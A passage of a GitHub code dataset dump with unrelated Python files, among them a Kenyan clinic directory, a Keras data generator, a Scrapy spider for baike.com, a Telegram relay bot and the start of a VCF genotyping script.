\"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.30 am to 7.30 pm\",\n \"Weekends\": \"8.30 am to 7.30 pm\"\n }\n },\n {\n \"area\": \"Eastleigh\",\n \"county\": \"Nairobi\",\n \"link\": \"\",\n \"name\": \"Equity Afia, Eastleigh\",\n \"building\": \"Off General Waruingi Road, near Ismariot hotel\",\n \"tel\": \"0765 000085\",\n \"email\": \"https://goo.gl/maps/ULNwv6JqB8u4h12y9\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"10.00 am to 6.00 pm on Sundays\"\n }\n },\n {\n \"area\": \"Machakos\",\n \"county\": \"Machakos\",\n \"link\": \"https://goo.gl/maps/i5kWCyyg3hGfNDGWA\",\n \"name\": \"Equity Afia Medical Centre, Machakos\",\n \"building\": \"Kiamba Mall 2nd floor, Along Ngei Road\",\n \"tel\": \"0765 000067\",\n \"email\": \"\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 7.00 pm\",\n \"Weekends\": \"9.00 am to 5.00 pm\"\n }\n },\n {\n \"area\": \"Juja\",\n \"county\": \"Kiambu\",\n \"link\": \"https://goo.gl/maps/fcTQAHr4aKmnLxt46\",\n \"name\": \"Equity Afia, Juja\",\n \"building\": \"Kalimoni Highwayview Plaza, Ground Floor, Near Juja Bridge\",\n \"tel\": \"0765 000062\",\n \"email\": \"jujareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"9.00 am to 9.00 pm\",\n \"Weekends\": \"9.00 am to 7.30 pm\"\n }\n },\n {\n \"area\": \"Kitui\",\n \"county\": \"Kitui\",\n \"link\": \"https://goo.gl/maps/uqbgru8TEPjEENxv7\",\n \"name\": \"Equity Afia, Kitui\",\n \"building\": \"C House, 2nd Floor, Kitui-Kibwezi Road opp. Maguna Supermarket\",\n \"tel\": \"0765 000058\",\n \"email\": \"kituireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 7.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm\"\n }\n },\n {\n \"area\": \"SouthB\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/xjmGy3uxed3Te6HX9\",\n \"name\": \"Equity Afia, South B\",\n \"building\": \"Vumira House, 1st Floor, Mchumbi Road, South B Shopping Centre\",\n \"tel\": \"0765 000061\",\n \"email\": \"southbreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 7.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm\"\n }\n },\n {\n \"area\": \"Ngong Road\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/unFDjoLEd6WsrMcm8\",\n \"name\": \"Equity Afia, Ngong Road\",\n \"building\": \"KISM Towers, 1st Floor, Ngong Road, near Prestige Mall\",\n \"tel\": \"0765 000056\",\n \"email\": \"ngongroadreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 7.00 pm\",\n \"Weekends\": \"9.00 am to 5.00 pm only on Saturday\"\n }\n },\n {\n \"area\": \"Pangani\",\n \"county\": \"Nairobi\",\n \"link\": \"https://goo.gl/maps/DSYrTKkqytgtyp4q9\",\n \"name\": \"Equity Afia, Pangani\",\n \"building\": \"Goodwill Building Ground Floor-Agoi Road, Pangani Shopping Centre\",\n \"tel\": \"0765 000065\",\n \"email\": \"panganireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"24 hrs\",\n \"Weekends\": \"24 hrs\"\n }\n },\n {\n \"area\": \"Murang'a\",\n \"county\": \"Murang'a\",\n \"link\": \"https://goo.gl/maps/3BQsZiWmpLMyGcYUA\",\n \"name\": \"Equity Afia, Murang'a\",\n \"building\": \"ECN Building Ground & 1st Floor, Uhuru Street near National oil Petrol Station, Opp Absa bank\",\n \"tel\": \"0765 000052\",\n \"email\": \"Murangareception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm\"\n }\n },\n {\n \"area\": \"Kisii\",\n \"county\": \"Kisii\",\n \"link\": \"https://goo.gl/maps/Am5gE5HyL3QLKQVC9\",\n \"name\": \"Equity Afia, Kisii\",\n \"building\": \"Ouru Complex, 3rd floor Kisii-Kisumu Highway\",\n \"tel\": \"0765 000053\",\n \"email\": \"kisiireception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"8.00 am to 8.00 pm\"\n }\n },\n {\n \"area\": \"Matuu\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/9qaT2prT9LaYxP1V6\",\n \"name\": \"Equity Afia, Matuu\",\n \"building\": \"3rd Floor, A1 Plaza, along KC Road, Matuu\",\n \"tel\": \"\",\n \"email\": \"matuureception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 7.00 pm\"\n }\n },\n {\n \"area\": \"Kenol\",\n \"county\": \"TBD\",\n \"link\": \"https://goo.gl/maps/DQxLmNs1aCwQ3pxR8\",\n \"name\": \"Equity Afia, Kenol\",\n \"building\": \"Equity Bank Building, Mbotco Plaza, First Floor along Kenol Sagana Road\",\n \"tel\": \"0765 000049\",\n \"email\": \"kenolreception@equityafia.co.ke\",\n \"services\": [],\n \"operatingHours\":{\n \"Weekdays\": \"8.00 am to 8.00 pm\",\n \"Weekends\": \"9.00 am to 6.00 pm\"\n }\n },\n]\n","repo_name":"VinGitonga/eazzy-afia","sub_path":"backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":19220,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28613530977","text":"from collections import deque\n\n\ndef MaximumDepthOfBinaryTree(root) -> int:\n if not root:\n return 0\n queue = deque([root])\n depth = 0\n\n while queue:\n for i in range(len(queue)):\n node = queue.popleft()\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n depth += 1\n return depth","repo_name":"sillypoise/ds-algo","sub_path":"Problems/01. Easy/Maximum Depth of Binary Tree/Python/MaximumDepthOfBinaryTree.py","file_name":"MaximumDepthOfBinaryTree.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42414922987","text":"from back_off_model import back_off_model\r\n\r\n\r\ndef predict(trigram, bigram, unigram, test):\r\n count = 0\r\n\r\n values = list(unigram.values())\r\n values.sort()\r\n values.reverse()\r\n bad_selected_words = []\r\n\r\n for k, v in unigram.items():\r\n if v in values[0:75]:\r\n bad_selected_words.append(k)\r\n\r\n answer = []\r\n with open('labels.txt', 'r') as file:\r\n answer = file.readlines()\r\n answer = list(map(lambda x: x.split(', ')[1].split('\\n')[0].lower(), answer))\r\n correct = 0\r\n mishe = []\r\n\r\n for t in test:\r\n probable_word = {}\r\n for k in trigram.keys():\r\n p = back_off_model(k, trigram, bigram, unigram)\r\n\r\n if k.__contains__('|' + t[0] + ' ' + t[1]):\r\n word = k.split('|')[0]\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p\r\n else:\r\n probable_word[word] += p\r\n if k.__contains__(t[3] + '|' + t[1]):\r\n word = k.split(' ')[1]\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p\r\n else:\r\n probable_word[word] = p\r\n if k.__contains__(t[4] + '|') and k.__contains__(' ' + t[3]):\r\n word = k.split('|')[1].split(' ')[0]\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p\r\n else:\r\n probable_word[word] = p\r\n\r\n for k in bigram.keys():\r\n\r\n if k.__contains__('|' + t[1]):\r\n word = k.split('|')[0]\r\n\r\n p1 = back_off_model(word + '|' + t[0] + ' ' + t[1], trigram, bigram, unigram)\r\n p2 = back_off_model(t[3] + '|' + t[1] + ' ' + word, trigram, bigram, unigram)\r\n p3 = back_off_model(t[4] + '|' + word + ' ' + t[3], trigram, bigram, unigram)\r\n\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p1 + p2 + p3\r\n\r\n else:\r\n probable_word[word] += p1 + p2 + p3\r\n\r\n if k.__contains__(t[3] + '|'):\r\n\r\n word = k.split('|')[1]\r\n p1 = back_off_model(word + '|' + t[0] + ' ' + t[1], trigram, bigram, unigram)\r\n p2 = back_off_model(t[3] + '|' + t[1] + ' ' + word, trigram, bigram, unigram)\r\n p3 = back_off_model(t[4] + '|' + word + ' ' + t[3], trigram, bigram, unigram)\r\n\r\n if word not in probable_word.keys():\r\n if word in unigram.keys():\r\n probable_word[word] = p1 + p2 + p3\r\n else:\r\n probable_word[word] += p1 + p2 + p3\r\n\r\n pr_word = {}\r\n for key, pr in probable_word.items():\r\n if key not in bad_selected_words:\r\n pr_word[key] = pr\r\n print(pr_word.keys())\r\n\r\n try:\r\n max_probability = max(pr_word.values())\r\n except:\r\n max_probability = 0\r\n\r\n count += 1\r\n if answer[count - 1] in probable_word:\r\n mishe.append(answer[count - 1])\r\n\r\n words = []\r\n for k, v in pr_word.items():\r\n if v == max_probability:\r\n words.append(v)\r\n print(count, k, v)\r\n if answer[count - 1] == k:\r\n correct += 1\r\n print('correct')\r\n break\r\n\r\n print('correct = ' + str(correct))\r\n print('Accuracy =', int(correct) / 80)\r\n # print(mishe)\r\n","repo_name":"its-kz-again/AI_project-nlp-","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40709325634","text":"#!/usr/bin/env python3\n#\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom fealpy.pde.time_fractional_2d import FisherData2d\nfrom mpl_toolkits.mplot3d import Axes3D\n\npde = FisherData2d()\n\nmesh = pde.init_mesh(n=5)\ntimeline = pde.time_mesh(0, 1, 100)\n\nnode = mesh.entity('node')\ncell = mesh.entity('cell')\n\nuI = pde.solution(node, 1.0)\n\nfig = plt.figure()\naxes = fig.gca(projection='3d')\naxes.plot_trisurf(node[:, 0], node[:, 1], cell, uI, cmap=plt.cm.jet, lw=0.0)\n\nplt.show()\n\n","repo_name":"weihuayi/fealpy","sub_path":"example/oldexample/oldexample/TimeFractionalFEMRate2d.py","file_name":"TimeFractionalFEMRate2d.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":209,"dataset":"github-code","pt":"37"} +{"seq_id":"41608928955","text":"import pandas as pd\nimport os\nimport sys\nimport argparse as arg\nfrom tqdm import tqdm\n\nparser = arg.ArgumentParser()\nparser.add_argument('dir_path', type=str, help='directory or path file to predict')\nparser.add_argument('pred', choices=('C1', 'C2', 'False'), help='use prediction or not')\n\nargs = parser.parse_args(sys.argv[1:])\nfiles = os.listdir(os.path.join('../../Files/', args.dir_path))\nfiles = [file for file in files if file.endswith('.pickle')]\n\n\nif args.pred == 'C1':\n dictiona = {}\n for file in tqdm(files):\n \n df = pd.read_pickle(os.path.join('../../Files/', args.dir_path ,file))\n filename = file[0:-7]\n # print(f'tabulating {filename}')\n dictiona[filename] = [len(df), len(df[df['class_I'] == 0]), len(df[df['class_I'] == 1]), len(df['author'].unique())]\n \n df = pd.DataFrame.from_dict(dictiona, orient='index', columns=['posts', 'Non-Covid', 'Covid', 'authors'])\n\n\nif args.pred == 'C2':\n files = [file for file in files if file.startswith('d_')]\n dictiona = {}\n for file in tqdm(files):\n \n df = pd.read_pickle(os.path.join('../../Files/', args.dir_path ,file))\n filename = file[2:-7]\n # print(f'tabulating {filename}')\n df = df[df['class_I'] == 1]\n dictiona[filename] = [len(df), len(df[df['class_II'] == 0]), len(df[df['class_II'] == 1]), len(df[df['class_II'] == 2]), len(df['author'].unique())]\n \n df = pd.DataFrame.from_dict(dictiona, orient='index', columns=['posts', 'posts_anti', 'posts_neutral', 'posts_pro', 'authors'])\n\nelif args.pred == 'NOTHING':\n print('arg works')\n dictiona = {}\n for filename in os.listdir(os.path.join('../../Files/', args.dir_path)):\n if filename.endswith('.pickle'):\n df = pd.read_pickle(os.path.join('../../Files/', args.dir_path ,filename))\n file = filename[:-7]\n print(f'tabulating {file}')\n dictiona[file] = [len(df), len(df['author'].unique())]\n \n df = pd.DataFrame.from_dict(dictiona, orient='index', columns=['posts', 'authors'])\n\n\n\n\n\ndf.to_csv(os.path.join('../../Files/', args.dir_path, 'EDA_stats.csv'))","repo_name":"jvschlierf/networkthesis","sub_path":"analysis/EDA_stats.py","file_name":"EDA_stats.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6212496708","text":"from keras.utils import Sequence\nimport numpy as np\nimport sys,os\n\ndef load_files(batch):\n images = []\n labels = []\n for i in batch:\n x = np.load(i,allow_pickle=True,encoding='latin1')['arr_0'].item()\n keys = x.keys()\n for key in keys:\n values = np.array(x[key][0])\n images.append(values[0])\n labels.append(x[key][1])\n return np.array(images),np.array(labels)\n\ndef get_feature(labels,feature):\n feature_values = []\n for i in labels:\n feature_values.append(i[feature])\n feature_values = np.array(feature_values)\n return feature_values\n\ndef get_cuts(labels):\n feature_values = []\n for i in labels:\n try:\n feature_values.append(i[10])\n except:\n feature_values.append(0)\n feature_values=np.array(feature_values)\n return feature_values\n\ndef get_cos_values(zenith,azimuth,activation):\n cos1 = []\n cos2 = []\n cos3 = []\n for i,j in zip(zenith,azimuth):\n cos1.append(i/np.pi)\n if j < np.pi:\n cos2.append(j/np.pi)\n cos3.append(0)\n elif j >= np.pi:\n cos2.append((j-np.pi)/np.pi)\n cos3.append(1)\n \n return np.array(cos1),np.array(cos2),np.array(cos3)\n\n\nclass Data_generator(Sequence):\n\n def __init__(self,directory,batch_size,activation_function='sigmoid',percent=1.0,shuffle=False,first_iter=False,augmentations=None,up = 0):\n y = os.listdir(directory)\n self.files = []\n import random\n random.seed(10)\n\n for i in y:\n if random.uniform(0,1) < percent:\n self.files.append(directory+i)\n\n self.files = np.array(self.files)\n self.batch_size = batch_size\n self.files_split = np.array_split(self.files,np.ceil(len(self.files)/self.batch_size))\n self.shuffle = shuffle\n self.activation_function = activation_function\n self.on_epoch_end()\n self.first_iter = first_iter\n self.augment = augmentations\n self.up = up\n\n def __len__(self):\n #length = int(np.ceil(len(self.files)/float(self.batch_size)))\n length = len(self.files_split)\n return length\n\n def __getitem__(self,index):\n\n #indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]\n #list_IDs_temp = [self.files[k] for k in indexes]\n list_IDs_temp = self.files_split[index]\n\n X, Y = self.__data_generation(list_IDs_temp)\n \n return X, Y\n\n\n def on_epoch_end(self):\n self.indexes = np.arange(len(self.files_split))\n if self.shuffle == True:\n np.random.shuffle(self.indexes)\n\n def __data_generation(self,self_IDs_temp):\n images,labels = load_files(self_IDs_temp)\n pre_zenith_values = get_feature(labels,1)\n pre_azimuth_values = get_feature(labels,2)\n pre_line_fit_az = get_feature(labels,8)\n pre_line_fit_zen = get_feature(labels,9)\n line_fit_status = get_cuts(labels)\n energy = get_feature(labels,0)\n check_zip = list(zip(pre_zenith_values,pre_azimuth_values,pre_line_fit_az,pre_line_fit_zen,line_fit_status,energy))\n \n zenith_values = []\n azimuth_values = []\n line_fit_az = []\n line_fit_zen = []\n line_fit_stat = []\n energy_new = []\n \n for i in check_zip:\n zenith_values.append(i[0])\n azimuth_values.append(i[1])\n line_fit_az.append(i[2])\n line_fit_zen.append(i[3])\n line_fit_stat.append(i[4])\n energy_new.append(i[5])\n \n zenith_values = np.array(zenith_values)\n azimuth_values = np.array(azimuth_values)\n line_fit_az = np.array(line_fit_az)\n line_fit_zen = np.array(line_fit_zen)\n line_fit_stat = np.array(line_fit_stat)\n energy_new = np.array(energy_new)\n\n if self.up == 0:\n check = list(zip(zenith_values,azimuth_values,line_fit_az,line_fit_zen,images,line_fit_stat,energy_new))\n new_values = []\n for i in check:\n new_values.append(i)\n \n zenith_values = np.array(list(zip(*new_values))[0])\n azimuth_values = np.array(list(zip(*new_values))[1])\n images = np.array(list(zip(*new_values))[4],dtype=np.uint8)\n line_fit_az = np.array(list(zip(*new_values))[2])\n line_fit_zen = np.array(list(zip(*new_values))[3])\n\n\n elif self.up == 1:\n check = list(zip(zenith_values,azimuth_values,line_fit_az,line_fit_zen,images,line_fit_stat,energy_new))\n new_values = []\n for i in check:\n if np.log10(i[6]) < 5: \n new_values.append(i)\n \n zenith_values = np.array(list(zip(*new_values))[0])\n azimuth_values = np.array(list(zip(*new_values))[1])\n images = np.array(list(zip(*new_values))[4],dtype=np.uint8)\n line_fit_az = np.array(list(zip(*new_values))[2])\n line_fit_zen = np.array(list(zip(*new_values))[3])\n\n elif self.up == 2:\n check = list(zip(zenith_values,azimuth_values,line_fit_az,line_fit_zen,images,line_fit_stat,energy_new))\n new_values = []\n for i in check:\n if np.log10(i[6]) > 5:\n new_values.append(i)\n\n zenith_values = np.array(list(zip(*new_values))[0])\n azimuth_values = np.array(list(zip(*new_values))[1])\n images = np.array(list(zip(*new_values))[4],dtype=np.uint8)\n line_fit_az = np.array(list(zip(*new_values))[2])\n line_fit_zen = np.array(list(zip(*new_values))[3])\n\n cos1_line,cos2_line,cos3_line = get_cos_values(line_fit_zen,line_fit_az,self.activation_function)\n cos1,cos2,cos3 = get_cos_values(zenith_values,azimuth_values,self.activation_function)\n cos_values = np.array(list(zip(cos1,cos2,cos3)))\n cos_values_line = np.array(list(zip(cos1_line,cos2_line,cos3_line)))\n \n return [images],[cos1,cos2,cos3]\n \n \n \n\n\n \n\n","repo_name":"andyPhysics/DNN_Project","sub_path":"script/Network/Data_generator.py","file_name":"Data_generator.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"749854525","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom newSpider.items import NewspiderItem\nimport urllib\nimport re\nimport json\nsplit_sign = '##'\nclass HudongSpider(scrapy.Spider):\n name = 'hudong'\n allowed_domains = ['http://www.baike.com']\n # count = 0\n crops_file_object = open('crops.txt', 'r', encoding='utf-8').read()\n disease_file_object = open('disease.txt', 'r', encoding='utf-8').read()\n crops_wordList = crops_file_object.split() # 获取词表\n disease_wordList = disease_file_object.split()\n\n wordList = crops_wordList + disease_wordList\n start_urls = []\n # pp = 0\n for i in wordList: ##生成url列表\n cur = \"http://www.baike.com/wiki/\"\n cur = cur + str(i)\n start_urls.append(cur)\n # pp += 1\n # print(cur)\n # if pp > 100:\n # break\n def parse(self, response):\n #filename = \"encyclopedia.html\"\n #open(filename, 'wb').write(response.body)\n # div限定范围\n main_div = response.xpath('//div[@class=\"w-990\"]')\n# ——————————————————————————————————————————新————————————————————————————————————————————\n title = response.url.split('/')[-1] # ---------通过截取url获取title-------------\n # urllib.request 请求模块\n # urllib.error 异常处理模块\n # urllib.parse url解析模块\n # urllib.robotparser robots.txt解析模块\n title = urllib.parse.unquote(title)\n # find到了返回下标,没找到返回-1\n if title.find('isFrom=intoDoc') != -1:\n title = 'error'\n\n url = response.url # ---------------------url直接得到-------------------\n url = urllib.parse.unquote(url)\n\n # nodename\t选取此节点的所有子节点。\n # /\t从根节点选取。\n # //\t从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置。\n # .\t选取当前节点。\n # ..\t选取当前节点的父节点。\n # @\t选取属性。\n img = \"\" # -----------------------爬取图片url-----------------------------\n for p in main_div.xpath('.//div[@class=\"r w-300\"]/div[@class=\"doc-img\"]/a/img/@src'):\n img = p.extract().strip()\n\n openTypeList = \"\" # -----------------爬取开放域标签-------------------\n flag = 0 # flag用于分隔符处理(第一个词前面不插入分隔符)\n for p in main_div.xpath('.//div[@class=\"l w-640\"]/div[@class=\"place\"]/p[@id=\"openCatp\"]/a/@title'):\n if flag == 1:\n openTypeList += split_sign\n openTypeList += \" \"\n openTypeList += p.extract().strip()\n flag = 1\n\n detail = \"\" # ---------详细信息---------------\n detail_xpath = main_div.xpath('.//div[@class=\"l w-640\"]/div[@class=\"information\"]/div[@class=\"summary\"]/p')\n if len(detail_xpath) > 0:\n detailb = detail_xpath.xpath('string(.)').extract()[0].strip()\n detailc = re.sub(\"\\t|\\n|\\r\", \"\", detailb)\n detail += detailc.replace('\"', '')\n if detail == \"\": # 可能没有\n detail_xpath = main_div.xpath('.//div[@class=\"l w-640\"]/div[@id=\"content\"]')\n if len(detail_xpath) > 0:\n detaila = detail_xpath.xpath('string(.)').extract()[0].strip()\n detaild = re.sub(\"\\t|\\n|\\r\", \"\", detaila)\n detail += detaild.replace('\"', '')\n\n flag = 0\n baseInfoKeyList = \"\" # 基本信息的key值\n for p in main_div.xpath(\n './/div[@class=\"l w-640\"]/div[@name=\"datamodule\"]/div[@class=\"module zoom\"]/table//strong/text()'):\n if flag == 1:\n baseInfoKeyList += split_sign\n baseInfoKeyList += \" \"\n baseInfoKeyList += p.extract().strip()\n flag = 1\n\n ## 继续调xpath!!!!!!!!!!!!!\n flag = 0\n baseInfoValueList = \"\" # 基本信息的value值\n base_xpath = main_div.xpath('.//div[@class=\"l w-640\"]/div[@name=\"datamodule\"]/div[@class=\"module zoom\"]/table')\n for p in base_xpath.xpath('.//span'):\n if flag == 1:\n baseInfoValueList += split_sign\n baseInfoValueList += \" \"\n all_text = p.xpath('string(.)').extract()[0].strip()\n baseInfoValueList += all_text\n flag = 1\n# ————————————————————————————————————++————结束————————————————————————————————————————\n# ---------通过截取url获取name-------------\n# name = response.url.split('/')[-1]\n# # urllib.request 请求模块\n# # urllib.error 异常处理模块\n# # urllib.parse url解析模块\n# # urllib.robotparser robots.txt解析模块\n# name = urllib.parse.unquote(name)\n# if name.find('isFrom=intoDoc') != -1:\n# name = 'error'\n# -----------获取补全信息键---------------\n count = 0\n InfoKeyList = \"\"\n for p in main_div.xpath('.//div[@class=\"l w-640\"]/fieldset[@id=\"catalog\"]/div[@id=\"full-all\"]/ul/li/a/@title'):\n if count >= 0:\n InfoKeyList += split_sign\n InfoKeyList += p.extract().strip()\n count += 1\n# -----------获取补全信息值---------------\n counta = 0\n InfoValueList = \"\"\n info_xpath = main_div.xpath('.//div[@id=\"content\"]')\n for p in info_xpath.xpath('.//p'):\n if counta >= 0:\n InfoValueList += split_sign\n InfoValueList += \" \"\n if (re.sub('\\t|\\n|\\r',\"\",p.xpath('string(.)').extract()[0].strip())) != \"\":\n infoa = p.xpath('string(.)').extract()[0].strip()\n infob = re.sub('\\t|\\n|\\r',\"\",infoa)\n InfoValueList += infob.replace('\"','')\n counta += 1\n if counta == len(info_xpath.xpath('.//p')) and counta < count:\n for i in range(count-len(info_xpath.xpath('.//p'))):\n InfoValueList += \"##\"\n InfoValueList += \" \"\n if count == counta:\n break\n\n item = NewspiderItem()\n item['title'] = title.replace(u'\\xa0', u' ')\n item['url'] = url.replace(u'\\xa0', u' ')\n item['image'] = img.replace(u'\\xa0', u' ')\n item['openTypeList'] = openTypeList.replace(u'\\xa0', u' ')\n item['detail'] = detail.replace(u'\\xa0', u' ')\n item['baseInfoKeyList'] = baseInfoKeyList.replace(u'\\xa0', u' ')\n item['baseInfoValueList'] = baseInfoValueList.replace(u'\\xa0', u' ')\n item['baseInfoKeyList'] = baseInfoKeyList.replace(u'\\xa0', u' ')\n item['baseInfoValueList'] = baseInfoValueList.replace(u'\\xa0', u' ')\n item['InfoKeyList'] = InfoKeyList.replace(u'\\xa0', u' ')\n item['InfoValueList'] = InfoValueList.replace(u'\\xa0', u' ')\n\n # file = open('newSpider/data/hudong_pedia.json', 'wb')\n # line = \"\"\n # line += json.dumps(dict(item), ensure_ascii=False) + '\\n'\n # file.write(line)\n yield item","repo_name":"XuanMi/KnowledgeMap","sub_path":"new_spider/newSpider/newSpider/spiders/hudong.py","file_name":"hudong.py","file_ext":"py","file_size_in_byte":7355,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"25172614698","text":"from google.cloud import texttospeech\nfrom pydub import AudioSegment\nfrom pydub.playback import play\nimport io\n\n\nclass TextToSpeech:\n def __init__(self):\n self.client = texttospeech.TextToSpeechClient()\n self.voice = texttospeech.VoiceSelectionParams(\n language_code='en-US',\n name=\"en-US-Wavenet-J\"\n )\n self.audio_config = texttospeech.AudioConfig(\n audio_encoding=texttospeech.AudioEncoding.MP3\n )\n\n def generate_mp3(self, text: str) -> bytes:\n \"\"\"\n Converts text to speech and returns the mp3 data\n \"\"\"\n synthesis_input = texttospeech.SynthesisInput(text=text)\n response = self.client.synthesize_speech(\n input=synthesis_input, voice=self.voice, audio_config=self.audio_config\n )\n return response.audio_content\n\n def say(self, text: str) -> None:\n \"\"\"\n Converts text to speech and plays it using pydub\n \"\"\"\n mp3_data = self.generate_mp3(text)\n play(AudioSegment.from_file(io.BytesIO(mp3_data), format=\"mp3\"))\n","repo_name":"AlecHaring/openai-conversation","sub_path":"src/text_to_speech.py","file_name":"text_to_speech.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11279380706","text":"import Telibrary\n### to make a bot\nimport botlib\n### to make it a messanger bot\n\n### inintializing the bot:\nbot = Telibrary.Bot(\n '', ### token\n '', ### owner's numerical ID\n {\n 'https': 'socks5h://127.0.0.1:9050' ### proxy\n }\n)\n\nMessanger = botlib.MessengerBot(bot)\n\n### I needed a tmp file to save the update id.\n### give it the full path (pwd/tmp.txt)\nupdater = open('tmp.txt', 'r')\nupdateid = updater.readline()\nupdater.close()\n\ndef main(updateid):\n while True:\n res = bot.update(updateid)\n if res.json()['result'] != 0:\n for i in res.json()['result']:\n if i['message']['from']['id'] != int(bot.ADMINID):\n Messanger.get_it(i)\n updateid = i['update_id'] + 1\n else:\n try:\n if i['message']['text'] == '/For':\n Messanger.tell_admin('your next message will be forwarded to this user; /C to cancel!',\n i['message']['reply_to_message']['message_id'])\n updateid = i['update_id'] + 1\n is_done = False\n while not is_done:\n tmp_res = bot.update(updateid)\n if tmp_res.json()['result'] != 0:\n for j in tmp_res.json()['result']:\n if str(j['message']['from']['id']) != bot.ADMINID:\n messnger.get_it(j)\n updateid = j['update_id'] + 1\n else:\n if j['message']['text'] == '/C':\n Messanger.tell_admin('cancelled!', j['message']['message_id'])\n updateid = j['update_id'] + 1\n is_done = True\n else:\n bot.forward(i['message']['reply_to_message']['forward_from']['id'], \n bot.ADMINID, \n j['message']['message_id'])\n updateid = j['update_id'] + 1\n Messanger.tell_admin('done',\n j['message']['message_id'])\n updateid = j['updateid'] + 1\n elif i['message']['text'] == '/Help':\n Messanger.tell_admin('reply to reply and /For to forward!')\n updateid = i['update_id'] + 1\n else:\n Messanger.send_it(i)\n updateid = i['update_id'] + 1\n except:\n pass\n### give it the full path (pwd/tmp.txt)\n updater = open('tmp.txt', 'w')\n updater.writelines(str(updateid))\n updater.close()\n\nif __name__ == '__main__':\n main(updateid)\n","repo_name":"Eminor021/Telenger","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26544915505","text":"#!/usr/bin/python3\nfrom argparse import ArgumentParser\nimport sys\nfrom os import path\nfrom collections import defaultdict, namedtuple\nimport logging\n\nlogging.basicConfig(filename='genotyping_warnings.log', filemode='w', format='%(message)s')\n\nparser = ArgumentParser()\nparser.add_argument(\"inputfile\", help = \"Input file in vcf format. Only works for pseudoSample vcf.\")\nparser.add_argument(\"contig_alignment_file\", help = \"Alignments per chromosome. File usually generated by CRAM2VCF.pl with suffix _alignmentsPerRefID\")\nparser.add_argument(\"qid_prefix\", help = \"Path and prefix to *.queryIDs files\")\nparser.add_argument(\"samples\", help = \"File listing SampleIDs and ChromosomeIDs. E.g. 'human01 human01.h0 human01.h1' . These IDs will be related to the IDs specified with split_identify_fasta.py\")\nparser.add_argument(\"--mode\", help = \"[overlapping|pseudosamples*] , *:default\", default = \"pseudosamples\")\nparser.add_argument(\"outputfile\", help=\"Output file in vcf format\")\nargs = parser.parse_args()\n\n\"\"\"\n\nPseudosamples format\n#CHROM POS ID REF ALT QUAL FILTER INFO\nchr1 10815 . T TC . PASS . GT:CONTIG 0/1/0/0/0/0:0,1,2,3,4,5\n\nOverlapping format\n#CHROM POS ID REF ALT QUAL FILTER INFO\nchr1 10815 . T TC . PASS CONTIG=0/2/3/4/5,1\n\n\"\"\"\n \nclass Genotypes():\n def __init__(self,sids,samplefile):\n self.sampleIds = sids\n self.samplePos = {} # positions of haplotypes\n with open(samplefile) as f:\n for line in f:\n sid, sid1, sid2 = line.rstrip().split()\n if sid not in self.sampleIds:\n print(sid + \" in sampleID file not in specified ids.\")\n self = None\n pos = self.sampleIds.index(sid)*2 # diploid\n self.samplePos[sid1] = pos\n self.samplePos[sid2] = pos + 1\n\n def get_header(self):\n return \"\\t\".join(self.sampleIds)\n\n def get_fullgenotypestring(self, gtstring):\n \"\"\" Transforms '0100' to '0|1 0|0'\"\"\"\n final = \"\"\n for i in range(0, len(gtstring), 2):\n gt = \".\" if gtstring[i] == \"-\" else gtstring[i]\n final += gt\n final += \"|\"\n gt = \".\" if gtstring[i+1] == \"-\" else gtstring[i+1]\n final += 